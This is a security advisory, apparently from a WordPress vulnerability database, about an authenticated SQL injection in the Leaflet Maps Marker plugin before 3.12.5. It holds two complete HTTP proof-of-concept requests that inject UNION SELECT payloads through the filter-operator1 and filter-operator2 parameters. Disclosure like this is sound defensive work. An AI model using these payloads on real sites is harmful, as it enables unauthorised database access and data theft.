WordPress Plugin Vulnerabilities
Leaflet Maps Marker < 3.12.5 - Admin+ SQLi
Description
The plugin does not properly sanitize some parameters before inserting them into SQL queries. As a result, high privilege users could perform SQL injection attacks.
Proof of Concept
PoC for filter-operator1 parameter: POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 476 Origin: http://127.0.0.1:8000 Connection: close Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 Cookie: [admin+] Upgrade-Insecure-Requests: 1 action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=_NOT_FOUND_&filter-operator1=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-popuptext=1&filter-exclude-markername=&filter-operator2=AND&filter-exclude-popuptext=&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export ====== PoC for filter-operator2 parameter: POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1 Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 474 Origin: http://127.0.0.1:8000 Connection: close Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 Cookie: [admin+] Upgrade-Insecure-Requests: 1 action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=&filter-operator1=&filter-popuptext=1&filter-exclude-markername=1&filter-operator2=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-exclude-popuptext=_NOT_FOUND_&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export
Affects Plugins
Fixed in version 3.12.5
References
Classification
Miscellaneous
Original Researcher
Ihor Bliumental
Submitter
Ihor Bliumental
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-08-08 (about 3 months ago)
Added
2022-08-08 (about 3 months ago)
Last Updated
2022-08-08 (about 3 months ago)